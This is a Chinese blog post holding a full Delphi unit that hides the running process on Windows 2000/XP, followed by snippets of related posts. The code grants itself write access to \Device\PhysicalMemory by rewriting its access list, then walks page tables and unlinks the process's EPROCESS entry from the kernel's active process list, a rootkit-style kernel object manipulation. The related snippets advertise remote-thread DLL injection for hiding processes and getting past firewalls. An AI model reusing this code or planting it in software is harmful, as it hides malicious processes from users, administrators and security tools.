Delphi隐藏进程

interface  

function MyHideProcess: Boolean;  

implementation  

uses
Windows,
Classes, AclAPI, accCtrl;  

type
NTSTATUS = LongInt;  

const
//NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);
STATUS_ACCESS_DENIED = NTSTATUS($C0000022);
OBJ_INHERIT = $00000002;
OBJ_PERMANENT = $00000010;
OBJ_EXCLUSIVE = $00000020;
OBJ_CASE_INSENSITIVE = $00000040;
OBJ_OPENIF = $00000080;
OBJ_OPENLINK = $00000100;
OBJ_KERNEL_HANDLE = $00000200;
OBJ_VALID_ATTRIBUTES = $000003F2;  

type
PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
IO_STATUS_BLOCK = record
Status: NTSTATUS;
FObject: DWORD;
end;  

PUNICODE_STRING = ^UNICODE_STRING;
UNICODE_STRING = record
Length: Word;
MaximumLength: Word;
Buffer: PWideChar;
end;  

POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
OBJECT_ATTRIBUTES = record
Length: DWORD;
RootDirectory: Pointer;
ObjectName: PUNICODE_STRING;
Attributes: DWORD;
SecurityDescriptor: Pointer;
SecurityQualityOfService: Pointer;
end;  

TZwOpenSection = function(SectionHandle: PHandle;
DesiredAccess: ACCESS_MASK;
ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
SourceString: PWideChar); stdcall;  

var
RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
ZwOpenSection: TZwOpenSection = nil;
g_hNtDLL: THandle = 0;
g_pMapPhysicalMemory: Pointer = nil;
g_hMPM: THandle = 0;
g_hMPM2: THandle = 0;
g_osvi: OSVERSIONINFO;
b_hide: Boolean = false;
//---------------------------------------------------------------------------  

function InitNTDLL: Boolean;
begin
g_hNtDLL := LoadLibrary(‘ntdll.dll‘);  

if 0 = g_hNtDLL then
begin
Result := false;
Exit;
end;  

RtlInitUnicodeString := GetProcAddress(g_hNtDLL, ‘RtlInitUnicodeString‘);
ZwOpenSection := GetProcAddress(g_hNtDLL, ‘ZwOpenSection‘);  

Result := True;
end;
//---------------------------------------------------------------------------  

procedure CloseNTDLL;
begin
if (0 <> g_hNtDLL) then
FreeLibrary(g_hNtDLL);
g_hNtDLL := 0;
end;
//---------------------------------------------------------------------------  

procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
var
pDacl: PACL;
pSD: PPSECURITY_DESCRIPTOR;
pNewDacl: PACL;
dwRes: DWORD;
ea: EXPLICIT_ACCESS;
begin
pDacl := nil;
pSD := nil;
pNewDacl := nil;  

dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);  

if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end;  

ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions := SECTION_MAP_WRITE;
ea.grfAccessMode := GRANT_ACCESS;
ea.grfInheritance := NO_INHERITANCE;
ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
ea.Trustee.ptstrName := ‘CURRENT_USER‘;  

dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl);  

if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end;  

dwRes := SetSecurityInfo
(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);  

if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end;  

end;
//---------------------------------------------------------------------------  

function OpenPhysicalMemory: THandle;
var
status: NTSTATUS;
physmemString: UNICODE_STRING;
attributes: OBJECT_ATTRIBUTES;
PhyDirectory: DWORD;
begin
g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);
GetVersionEx(g_osvi);  

if (5 <> g_osvi.dwMajorVersion) then
begin
Result := 0;
Exit;
end;  

case g_osvi.dwMinorVersion of
0: PhyDirectory := $30000;
1: PhyDirectory := $39000;
else
begin
Result := 0;
Exit;
end;
end;  

RtlInitUnicodeString(@physmemString, ‘\Device\PhysicalMemory‘);  

attributes.Length := SizeOf(OBJECT_ATTRIBUTES);
attributes.RootDirectory := nil;
attributes.ObjectName := @physmemString;
attributes.Attributes := 0;
attributes.SecurityDescriptor := nil;
attributes.SecurityQualityOfService := nil;  

status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);  

if (status = STATUS_ACCESS_DENIED) then
begin
ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);  

status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
end;  

if not (LongInt(status) >= 0) then
begin
Result := 0;
Exit;
end;  

g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);  

if (g_pMapPhysicalMemory = nil) then
begin
Result := 0;
Exit;
end;  

Result := g_hMPM;
end;
//---------------------------------------------------------------------------  

function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;
var
VAddr, PGDE, PTE, PAddr, tmp: DWORD;
begin
VAddr := DWORD(addr);
// PGDE := BaseAddress[VAddr shr 22];
PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // modify by dot.  

if 0 = (PGDE and 1) then
begin
Result := nil;
Exit;
end;  

tmp := PGDE and $00000080;  

if (0 <> tmp) then
begin
PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF);
end
else
begin
PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));
// PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12];
PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // modify by dot.  

if (0 = (PTE and 1)) then
begin
Result := nil;
Exit;
end;  

PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF);
UnmapViewOfFile(Pointer(PGDE));
end;  

Result := Pointer(PAddr);
end;
//---------------------------------------------------------------------------  

function GetData(addr: Pointer): DWORD;
var
phys, ret: DWORD;
tmp: PDWORD;
begin
phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,
phys and $FFFFF000, $1000));  

if (nil = tmp) then
begin
Result := 0;
Exit;
end;  

// ret := tmp[(phys and $FFF) shr 2];
ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // modify by dot.
UnmapViewOfFile(tmp);  

Result := ret;
end;  

function SetData(addr: Pointer; data: DWORD): Boolean;
var
phys: DWORD;
tmp: PDWORD;
begin
phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));  

if (nil = tmp) then
begin
Result := false;
Exit;
end;  

// tmp[(phys and $FFF) shr 2] := data;
PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^ := data; // modify by dot.
UnmapViewOfFile(tmp);  

Result := TRUE;
end;
//---------------------------------------------------------------------------
{long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
begin
ExitProcess(0);
return 1 ;
end }
//---------------------------------------------------------------------------  

function YHideProcess: Boolean;
var
thread, process: DWORD;
fw, bw: DWORD;
begin
// SetUnhandledExceptionFilter(exeception);
if (FALSE = InitNTDLL) then
begin
Result := FALSE;
Exit;
end;  

if (0 = OpenPhysicalMemory) then
begin
Result := FALSE;
Exit;
end;  

thread := GetData(Pointer($FFDFF124)); //kteb
process := GetData(Pointer(thread + $44)); //kpeb  

if (0 = g_osvi.dwMinorVersion) then
begin
fw := GetData(Pointer(process + $A0));
bw := GetData(Pointer(process + $A4));  

SetData(Pointer(fw + 4), bw);
SetData(Pointer(bw), fw);  

Result := TRUE;
end
else if (1 = g_osvi.dwMinorVersion) then
begin
fw := GetData(Pointer(process + $88));
bw := GetData(Pointer(process + $8C));  

SetData(Pointer(fw + 4), bw);
SetData(Pointer(bw), fw);  

Result := TRUE;
end
else
begin
Result := False;
end;  

CloseHandle(g_hMPM);
CloseNTDLL;
end;  

function MyHideProcess: Boolean;
begin
if not b_hide then
begin
b_hide := YHideProcess;
end;  

Result := b_hide;
end;  

end.

  

时间: 2024-10-22 02:13:05

Delphi隐藏进程的相关文章

探讨下在Delphi里面进程之间的数据共享

进程是一个具有一定独立功能的程序关于某个数据集合的一次运行活动.它是操作系统动态执行的基本单元,在传统的操作系统中,进程既是基本的分配单元,也是基本的执行单元.现在小编就和大家来探讨一下在Delphi里面进程之间的数据共享吧. 一.动态链接库 DLL(即动态链接库),是Dynamic Link Library的缩写形式,它是一个包含可由多个程序同时使用的代码和数据的库.除此之外,它还是实现代码重用的重要手段,创建Windows应用程序.那么问题就来了?当我们需要在进程之间共享数据的时候,应该如何

遍历进程活动链表(ActiveProcessLinks)、DKOM隐藏进程

1.EPROCESS结构体 EPROCESS块来表示.EPROCESS块中不仅包含了进程相关了很多信息,还有很多指向其他相关结构数据结构的指针.例如每一个进程里面都至少有一个ETHREAD块表示的线程.进程的名字,和在用户空间的PEB(进程环境)块等等.EPROCESS中除了PEB成员块在是用户空间,其他都是在系统空间中的. 2.查看EPROCESS结构 kd> dt_eprocessntdll!_EPROCESS   +0×000 Pcb              : _KPROCESS  

遍历PspCidTable表检测隐藏进程

一.PspCidTable概述 PspCidTable也是一个句柄表,其格式与普通的句柄表是完全一样的,但它与每个进程私有的句柄表有以下不同: 1.PspCidTable中存放的对象是系统中所有的进程线程对象,其索引就是PID和TID. 2.PspCidTable中存放的直接是对象体(EPROCESS和ETHREAD),而每个进程私有的句柄表则存放的是对象头(OBJECT_HEADER). 3.PspCidTable是一个独立的句柄表,而每个进程私有的句柄表以一个双链连接起来.注意访问对象时要掩

linux如和对其他用户隐藏进程?

Linux kernel 3.2以上,root用户可以设置内核,让普通用户看不到其它用户的进程.适用于有多个用户使用的系统.该功能由内核提供,因此本教程适用于Debian/Ubuntu/RHEL/CentOS等. 原理 Linux中,可以通过/proc文件系统访问到许多内核的内部信息./proc文件系统最初的设计也是用于方便地访问进程相关的信息,因此命名为proc.现在这个文件系统已用于反映系统中方方面面的信息,例如/proc/modules是模块的列表,/proc/meminfo则是内存使用的

安全之路 —— 利用远程线程注入的方法(使用DLL)实现穿墙与隐藏进程

简介 大多数后门或病毒要想初步实现隐藏进程,即不被像任务管理器这样典型的RING3级进程管理器找到过于明显的不明进程,其中比较著名的方法就是通过远程线程注入的方法注入将恶意进程的DLL文件注入系统认可的正常进程,你会发现任务管理器以及找不到独立出现的恶意进程项了.反向连接型后门采用这种技术,注入防火墙认可的进程(例如大部分系统进程,像explorer.exe就很常见)还能够获得一定的穿墙效果. 进程注入虽然已经是将近10年前的技术了,但是今天出现的很多新型黑客技术大多数还是基于这类老技术演变而来

delphi杀进程的两种方式

第一种:比较简单,根据标题,找到窗口,再找到进程,杀死进程 [delphi] view plain copy procedure KillProgram(WindowTitle : string); const PROCESS_TERMINATE = $0001; var ProcessHandle : THandle; ProcessID: Integer; TheWindow : HWND; begin TheWindow := FindWindow(nil, PChar(WindowTit

delphi根据进程PID获取程序所在路径的函数(用OpenProcess取得句柄,用GetModuleFileNameEx取得程序名)

uses psapi; {根据进程PID获取程序所在路径的函数}function GetProcessExePath(PID: Cardinal): string;varpHandle: THandle;buf: array[0..MAX_PATH] of Char;begin{获取进程句柄}pHandle := OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_READ, False, PID);{获取进程路径}GetModuleFileN

浅谈Delphi中进程间的数据共享

DLL是创建Windows应用程序,实现代码重用的重要手段.那么当我们需要在进程间共享数据时,怎样做才能快捷方便地实现呢?在32位应用系统中,每个应用程序会将DLL映射到自己的地址空间,同时DLL中的数据也就随之被映射了.这样,每个应用程序都有自己的数据实例,在一个应用程序中修改DLL中的全局变量,不会影响其它的应用程序.DLL的使用似乎与我们的目的相背离,那么如何才能实现我们想要的东东呢?这里给大家介绍一种特殊的技术,那就是内存映射文件. 内存映射文件提供了一种方法,就是在WIN32系统的地址

Delphi监视进程并结束进程

监视进程并结束进程在很多地方都用到这里借前人的经验写了个小例子: 以QQ的进程qq.exe为例 关键代码如下: function CheckTask(ExeFileName: string): Boolean; const PROCESS_TERMINATE=$0001; var ContinueLoop: BOOL; FSnapshotHandle: THandle; FProcessEntry32: TProcessEntry32; begin result := False; FSnaps